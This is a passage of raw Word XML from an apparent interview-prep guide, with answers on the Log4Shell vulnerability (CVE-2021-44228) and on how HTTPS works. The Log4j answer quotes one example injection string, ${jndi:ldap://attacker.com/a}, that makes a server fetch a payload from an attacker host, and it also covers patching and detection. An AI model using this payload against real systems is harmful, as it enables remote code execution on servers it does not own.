      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="2B2A1781" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15DABD7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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03A3A9F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mited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BC4ED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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5747AAD3" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D4719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intenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5915F9B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rder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B195E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sier (decoupled layers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F5AF4C2" w14:textId="14F59AD2"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3900" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22D5BE" w14:textId="1BE0E510" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="007C281D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="963" w:name="_Toc197868177"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Have you heard about the log4j vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="963"/>
    </w:p>
    <w:p w14:paraId="55595D49" w14:textId="4653B94C"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m familiar with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which was a significant security flaw discovered in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging library (specifically version 2.0 to 2.14.1). Here's an overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C920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Log4j Vulnerability (CVE-2021-44228) - "Log4Shell"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A446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ulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The vulnerability, called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allows attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execute arbitrary code remotely</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by exploiting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JNDI (Java Naming and Directory Interface) lookup feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Log4j 2.x versions. This occurs when user-controlled input (such as a string) is logged in a way that allows the attacker to trigger a lookup and execute malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFBA1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ow it Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149258C0"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Log4j 2.x versions allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string-based logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and have a feature that supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variable substitution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in log messages using ${}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D637C2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tackers can inject a specially crafted string containing JNDI lookups, such as ${jndi:ldap://attacker.com/a}, where the JNDI lookup would fetch malicious payloads from an external server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F3CD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he logging mechanism handles this input unsanitized, it can cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remote code execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, potentially allowing attackers to control the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEA97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verity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E77F6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is vulnerability was classified a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CVSS score of 10), as it is relatively easy to exploit and can allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the affected system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FC8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was highly impactful because Log4j is widely used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across many industries, from enterprise applications to open-source projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196F214"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Mitigation and Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1DD6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grading Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C27A7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j 2.15.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> release (and subsequent releases) patched this vulnerability. Updating to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.16.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or higher is recommended, as it fully disables the problematic JNDI lookups by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18479B71"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mporary Workaround</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22EE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 Patch Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33A7AF"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important to patch and test systems quickly, especially if they are exposed to the internet or are running high-value services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4A26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vulnerable systems, it's also critical to monitor and look for any indicators of compromise, as attackers may have exploited the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6AA8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act:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A899CF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vulnerability caused widespread concern, with many organizations scrambling to patch affected systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5897D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affected </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud services, web applications, and enterprise systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5C5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fected products included </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Solr, Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and many other services using Log4j for logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C5621"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Steps for Organizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF106D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date Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the latest patched version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9FE0D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for exploitation attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by checking logs and network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F823CB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sess and audit affected applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for potential breaches or compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F84A1" w14:textId="77777777" w:rsidR="00574FE8"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CDDB0D">
          <v:rect id="_x0000_i3901" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FFA0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working in a Java-based application, ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j 2.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is updated to a secure version, or you can switch to a different logging framework like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319FFF0" w14:textId="5225A60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3902" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510D5CA" w14:textId="3E9996E9" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00692C14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="964" w:name="_Toc197868178"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is https protocol</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="964"/>
    </w:p>
    <w:p w14:paraId="36F9DBE1" w14:textId="57192755" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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68FCD01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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9092E"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transferred between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C721455"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cryption prevents third parties (such as hackers) from intercepting or tampering with the data during transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82ECE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC8171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HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>digital certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to authenticate the identity of the website or server, ensuring the client is communicating with the intended server and not an impostor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AA2C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is issued by a trusted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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3627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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5559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ensures that the data sent and received is not altered or corrupted during transmission. This is done by using hash functions in the protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41139D"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Process (Secure Connection Establishment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A49D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sends a request</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server using HTTPS (e.g., https://www.example.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EEAA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responds with a digital certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which includes the server's public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E1CE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verifies the certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against trusted Certificate Authorities to ensure the server’s identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B7C84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 where the client and server agree on encryption methods and generate session keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089FC2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 communication begins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, with all data being encrypted using session keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BCAF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HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5912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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DC2C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crypts sensitive data such as passwords, credit card numbers, personal information, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49064F31"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tects against </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>man-in-the-middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MITM) attacks, where attackers intercept or alter data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218F12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cy</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E843A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unauthorized parties from monitoring the communication between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678396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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E24A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S are often considered more trustworthy, as users can see the padlock symbol or "Secure" label in the browser's address bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411733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is a signal of security, which can build user confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DB65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 Benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9B5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a ranking boost to websites that use HTTPS, promoting a more secure internet overall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E502CC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2550"/>
        <w:gridCol w:w="4152"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="360FD171" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
